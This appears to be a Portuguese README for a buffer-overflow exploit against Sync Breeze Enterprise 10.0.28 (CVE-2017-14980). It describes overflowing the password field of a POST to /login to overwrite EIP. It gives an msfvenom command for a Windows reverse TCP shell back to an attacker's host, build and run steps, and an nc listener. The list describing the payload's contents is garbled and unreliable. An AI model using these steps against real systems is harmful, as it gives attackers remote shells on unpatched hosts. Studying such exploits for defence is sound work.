Exploit de estouro de buffer de prova de conceito para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envia payload HTTP POST malicioso para sobrescrever EIP e executar shellcode x86 personalizado para execução arbitrária de código.
Este repositório contém uma prova de conceito de exploit de buffer overflow (BOF) para o Sync Breeze Enterprise versão 10.0.28, visando a vulnerabilidade identificada como CVE-2017-14980.
A vulnerabilidade existe devido à validação inadequada de entrada ao processar o campo password em uma requisição POST para o endpoint /login.
Um atacante pode enviar um valor excessivamente longo neste campo, o que sobrescreve o EIP e permite a execução arbitrária de código.
Este exploit envia uma carga (payload) cuidadosamente elaborada contendo:
'A')password.gcc)\x83\x0C\x09\x10) e do shellcode, se necessárioExemplo de geração de shellcode com msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444